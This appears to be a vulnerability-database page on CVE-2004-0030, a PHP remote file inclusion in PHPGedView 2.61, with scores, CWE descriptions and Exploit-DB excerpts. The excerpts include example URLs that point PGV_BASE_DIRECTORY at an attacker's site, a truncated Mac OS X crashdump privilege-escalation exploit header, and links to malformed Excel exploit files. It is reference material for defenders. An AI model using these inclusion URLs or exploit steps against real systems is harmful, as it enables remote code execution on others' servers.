CVE-2004-0030
Published 2004-01-20
Priority P341 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS 6.84% (93.2th percentile)
PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgedview | phpgedview | — | — |
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Exploit-DB
exploitdb·2007-01-29
CVE-2007-0467 Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 .....@.......0..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
Exploit-DB
exploitdb·2006-01-09
CVE-2006-0030 Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
---
source: https://www.securityfocus.com/bid/16181/info
Microsoft Excel is susceptible to a code-execution vulnerability. The issue presents itself when Excel tries to process malformed or corrupted XLS files.
Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-1.xls
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-2.xls
Exploit-DB
exploitdb·2004-01-06
CVE-2004-0030 PHPGedView 2.61 - Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/9368/info
PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
These issues are reported to affect PhpGedView 2.61. Other versions are also likely affected.
http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BA
No writeups or analysis indexed.
CWE
mitre_cwe
CWE-829: Inclusion of Functionality from Untrusted Control Sphere
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality, Integrity, Availability. Impact: Execute Unauthorized Code or Commands. An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or permissions to t
CWE
mitre_cwe
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope:
http://marc.info/?l=bugtraq&m=107340840209453&w=2
http://secunia.com/advisories/10565
http://www.osvdb.org/3343
http://www.securityfocus.com/bid/9368
http://www.securitytracker.com/id?1008632
https://exchange.xforce.ibmcloud.com/vulnerabilities/14159
Published: 2004-01-20